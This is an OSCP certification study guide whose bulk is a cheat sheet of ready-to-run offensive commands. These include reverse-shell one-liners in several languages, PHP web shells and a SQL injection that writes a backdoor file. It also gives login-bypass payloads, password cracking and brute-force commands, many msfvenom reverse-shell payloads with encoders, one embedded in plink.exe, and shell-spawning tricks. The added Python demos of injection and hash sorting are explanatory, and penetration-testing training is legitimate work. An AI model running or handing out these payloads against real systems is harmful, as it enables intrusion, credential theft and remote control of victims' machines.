WHAT IS OSCP ?
The Offensive Security Certified Professional is one of the most technical and most challenging certifications for information security professionals.
To become certified you must complete the Penetration Testing with Kali Linux (PwK) course and pass a “24 hour” hands-on exam, after which you have a further 24 hours to write the report.
Official Link : PEN-200 | PENETRATION TESTING COURSE & CERTIFICATION
OSCP SYLLABUS
- Getting Comfortable with Kali Linux
- Command Line Fun
- Practical Tools
- Bash Scripting
- Passive Information Gathering
- Active Information Gathering
- Vulnerability Scanning
- Web Application Attacks
- Buffer Overflows
- Client-Side Attacks
- Locating Public Exploits
- Fixing Exploits
- File Transfers
- Antivirus Evasion
- Privilege Escalation
- Password Attacks
- Port Redirection and Tunneling
- Active Directory Attacks
- The Metasploit Framework
- PowerShell Empire
- Penetration Test Breakdown
PREREQUISITES
Before you decide to register for the course you need to have some experience in the following areas :
- Linux Fundamentals : File System, Command Line etc.
- Networking Fundamentals : TCP/IP, Protocols etc.
- Programming Languages : Bash and Python
- Note Taking : Cherry Tree, KeepNote
EXAM DETAILS
- You will have a total of 23 hours and 45 mins for the exam.
- You will be proctored during your exam. Webcam and screen sharing software are required.
- The exam will consist of 5 target systems that are vulnerable and can be compromised.
- You will need a minimum of 70 points to pass.
- If you believe you have enough points you will have another 24 hours to write your report.
- An extra 5 points will be given if you are able to complete the lab report and the course exercises.
Restrictions :
You cannot use any of the following on the exam :
- Spoofing (IP, ARP, DNS, NBNS, etc.)
- Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
- Automatic exploitation tools (e.g. browser_autopwn, SQLmap, SQLninja, jsql, etc.)
- Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Core Impact, SAINT, etc.)
Exam Tips :
- Enumeration is the most important thing you can do.
- Prepare your cheat sheets, notes, tools, and exploits.
- Note Everything.
- Be patient, believe in yourself, and everything will fall into place!
LAB SETUP
GETTING STARTED WITH KALI LINUX
COMMAND LINE FUN
- Netcat
- PowerShell
- Wireshark
- Tcpdump
Kali Linux Tools : https://tools.kali.org/tools-listing
BASH SCRIPTING
Passive Information Gathering collects information about the targets from publicly available sources, without interacting with the targets themselves.
Active Information Gathering collects more information by interacting with the targets directly, for example port scanning, OS fingerprinting, and DNS, SMB, NFS, SMTP and SNMP enumeration.
VULNERABILITY SCANNING
WEB APPLICATION ATTACKS
- Web Application Enumeration : View the page source, check well-known files (robots.txt, security.txt, .git, readme.md, sitemap.xml, etc.), discover files and directories, brute-force login pages, check subdomains, find open ports and identify which web technologies the target site uses.
- Burp Suite
- OWASP Top Ten
- The Web Application Hacker's Handbook
BUFFER OVERFLOWS
CLIENT-SIDE ATTACKS
LOCATING PUBLIC EXPLOITS
FIXING EXPLOITS
Generating our own payload
FILE TRANSFERS
ANTIVIRUS EVASION
PRIVILEGE ESCALATION
Payload :
Linux :
Windows :
PASSWORD ATTACKS
Offline Password Cracking :
Online Password Cracking :
Wordlist Generators :
Wordlist :
Online Password Hash Cracker :
PORT REDIRECTION AND TUNNELING
ACTIVE DIRECTORY ATTACKS
POWERSHELL EMPIRE
PENETRATION TEST BREAKDOWN
Resource will be updated soon.
HELPFUL COMMANDS
SANS Cheat Sheets :
NMAP :
nmap -sC -sV -vv -oA quick 10.10.10.10
nmap -sU -sV -vv -oA quick_udp 10.10.10.10
nmap -sC -sV -p- -vv -oA full 10.10.10.10
for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 10.10.10.10; done
WEB SCANNING :
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x .txt,.php
nikto -h 10.10.10.10
wpscan -u 10.10.10.10/wp/
PORT CHECKING :
nc -v 10.10.10.10 port
telnet 10.10.10.10 port
NETCAT :
Download Netcat for Windows : http://bit.ly/netcat_exe
nc 10.10.10.10 1234 < file.zip
nc -l -p 1234 > file.zip
FILE TRANSFER :
python -m SimpleHTTPServer 80
python3 -m http.server 80
wget 10.10.10.10/file
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
python -m pyftpdlib -p 21 -w
echo open 10.10.10.10 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
atftpd --daemon --port 69 /tftp
tftp -i 10.10.10.10 GET nc.exe
SSH :
ssh user@10.10.10.10
ssh -i id_rsa user@10.10.10.10
ssh-keygen
chmod 644 id_rsa.pub
chmod 600 id_rsa
wget https://raw.githubusercontent.com/truongkma/ctf-tools/master/John/run/sshng2john.py
cp sshng2john.py /opt/JohnTheRipper/run/
python /opt/JohnTheRipper/run/sshng2john.py id_rsa > USERHASH
john --wordlist=/usr/share/wordlists/rockyou.txt USERHASH
hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
SSH TUNNELING / PIVOTING :
sshuttle -vvr user@10.10.10.10 10.0.0.1/24
ssh gateway -L local-port-to-listen:10.10.10.10:remote-port
ssh gateway -R remote-port-to-bind:127.0.0.1:local-port
ssh -D local-proxy-port -p remote-port 10.10.10.10
plink -l root -pw pass -R 3389:127.0.0.1:3389 10.10.10.10
SMB :
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
enum4linux -a 10.10.10.10
rpcclient -U "" 10.10.10.10
smbclient //MOUNT/share
SNMP :
snmp-check 10.10.10.10
REVERSE SHELL :
bash -i >& /dev/tcp/10.10.10.10/4443 0>&1
nc -e /bin/sh 10.10.10.10 4443
nc -e cmd.exe 10.10.10.10 4443
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect (("10.10.10.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
perl -e 'use Socket;$i="10.10.10.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")) ;if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10
php -r '$sock=fsockopen("10.10.10.10",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
xterm -display 10.10.10.10:1
Xnest :1
xhost +10.10.10.10
PHP :
<?php echo system($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>
POWERSHELL :
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
SQL INJECTION :
sqlmap -u http://10.10.10.10 --crawl=1
sqlmap -u http://10.10.10.10 --dbms=mysql --dump
sqlmap -u http://10.10.10.10 --dbms=mysql --os-shell
union all select 1,2,3,4,"",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -
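To show what the payloads above actually do to a query, and what stops them, here is an added example (not from the original page) in Python using an in-memory SQLite database with constructed sample data. It places the string-concatenated login query beside the same query written with bound parameters, and runs the page's `' or 1=1 --` style payloads against both. Function names and the sample user are assumptions for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory database for the demonstration (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.commit()
    return conn


def build_vulnerable_query(username, password):
    # The defect: untrusted input is pasted into the SQL text, so a quote in
    # the input closes the string literal and the remainder is parsed as SQL.
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    """Returns the matched username, or None. Bypassed by the payloads above."""
    try:
        row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    except sqlite3.OperationalError:
        # MySQL-style '#' comments are a syntax error in SQLite, so the '#'
        # payloads fail here; the comment style has to match the backend.
        return None
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same lookup with bound parameters: the input is always data, never SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for payload in ["' or 1=1 --", "' or 1=1 LIMIT 1 -- -", "'or 1#"]:
        print(repr(payload),
              "vulnerable:", login_vulnerable(db, payload, "x"),
              "safe:", login_safe(db, payload, "x"))
```

With the `--` payloads the vulnerable function returns `alice` although no password was supplied, because the comment swallows the `AND password = ...` clause; the parameterised version returns `None` for every payload and only succeeds with the real credentials. The fix is the query shape, not input filtering.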
BRUTE FORCE :
unshadow passwd shadow > unshadow.db
john unshadow.db
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username
hashcat -m 500 -a 0 hash.txt rockyou.txt --username
hashcat -m 1600 -a 0 hash.txt rockyou.txt
hashcat -m 100 -a 0 hash.txt rockyou.txt --force
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
ncrack -vv --user offsec -P passwords rdp://10.10.10.10
hydra -l user -P pass.txt -t 10 10.10.10.10 ssh -s 22
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp
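The hashcat commands above differ only in the `-m` mode number and the `--username` flag, and picking the wrong mode is the usual reason a run finds nothing. The following added example (not from the original page) maps the hash formats behind the modes used above (1800 sha512crypt, 500 md5crypt, 1600 Apache apr1, 400 phpass, 100 SHA-1) and parses unshadow-style `user:hash:...` lines into per-mode `user:hash` lists, skipping locked and passwordless accounts. The sample lines are constructed with dummy hash bodies of the right shape; the function names are assumptions.

```python
import re

# Hashcat mode numbers used in the commands above, keyed by hash family
# (taken from hashcat's own mode table).
HASHCAT_MODES = {
    "sha512crypt": 1800,   # $6$salt$hash    (modern /etc/shadow)
    "md5crypt": 500,       # $1$salt$hash    (older /etc/shadow)
    "apr1": 1600,          # $apr1$salt$hash (Apache htpasswd)
    "phpass": 400,         # $P$ or $H$ prefix (WordPress, phpBB)
    "sha1": 100,           # 40 hex characters, no prefix
}


def identify_hash(h):
    """Return the hash family name for one hash string, or None if unknown."""
    if h.startswith("$6$"):
        return "sha512crypt"
    if h.startswith("$apr1$"):
        return "apr1"
    if h.startswith("$1$"):
        return "md5crypt"
    if h.startswith("$P$") or h.startswith("$H$"):
        return "phpass"
    if re.fullmatch(r"[0-9a-f]{40}", h, re.IGNORECASE):
        return "sha1"
    return None


def parse_unshadow_line(line):
    """Parse one 'user:hash:...' line in the layout unshadow produces.

    Returns (user, hash, family). Locked or empty entries ('*', '!', '!!',
    or a hash prefixed with '!') have family None and should be skipped.
    """
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        return None
    user, h = fields[0], fields[1]
    if h in ("", "*", "!", "!!") or h.startswith("!"):
        return (user, h, None)
    return (user, h, identify_hash(h))


def group_for_hashcat(lines):
    """Group crackable entries by hashcat mode.

    Returns {mode: ["user:hash", ...]}; each list is the content of a hash.txt
    suitable for `hashcat -m <mode> -a 0 hash.txt wordlist --username`.
    """
    groups = {}
    for line in lines:
        parsed = parse_unshadow_line(line)
        if parsed is None or parsed[2] is None:
            continue
        user, h, family = parsed
        groups.setdefault(HASHCAT_MODES[family], []).append("%s:%s" % (user, h))
    return groups


# Constructed sample lines in unshadow layout; the hash bodies are dummy
# strings of the right length, not real hashes.
SAMPLE_LINES = [
    "root:$6$saltsalt$" + "A" * 86 + ":0:0:root:/root:/bin/bash",
    "legacy:$1$abcdefgh$" + "B" * 22 + ":1001:1001::/home/legacy:/bin/bash",
    "daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "locked:!$6$saltsalt$" + "C" * 86 + ":1002:1002::/home/locked:/bin/bash",
    "svc:" + "d" * 40 + ":1003:1003::/home/svc:/bin/false",
]

if __name__ == "__main__":
    for mode, entries in sorted(group_for_hashcat(SAMPLE_LINES).items()):
        print("hashcat -m %d -a 0 hash.txt rockyou.txt --username  (%d entries)"
              % (mode, len(entries)))
        for entry in entries:
            print("   ", entry)
```

Each resulting group is written to its own file and cracked with the matching `-m` value; the `--username` flag tells hashcat to ignore the `user:` prefix, which is why the plain SHA-1 line on the page omits it. Two of the five sample accounts are correctly left out: `daemon` has no password and `locked` is disabled with a `!` prefix.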
MSFVENOM PAYLOADS :
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windowsbinaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
SHELL SPAWNING :
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
echo $TERM
stty -a
echo os.system('/bin/bash')      # from an interactive Python session
/bin/sh -i
exec "/bin/sh";                  # from an interactive Perl session
perl -e 'exec "/bin/sh";'
exec "/bin/sh"                   # from Ruby
os.execute('/bin/sh')            # from an interactive Lua session
exec "/bin/sh"                   # from an irb session
:!bash                           # from within vi/vim
:set shell=/bin/bash:shell       # from within vi/vim
!sh                              # from nmap --interactive (older nmap versions)
PRACTICE LABS
VulnHub :
HackTheBox :
MORE RESOURCES
More learning resources will be added soon...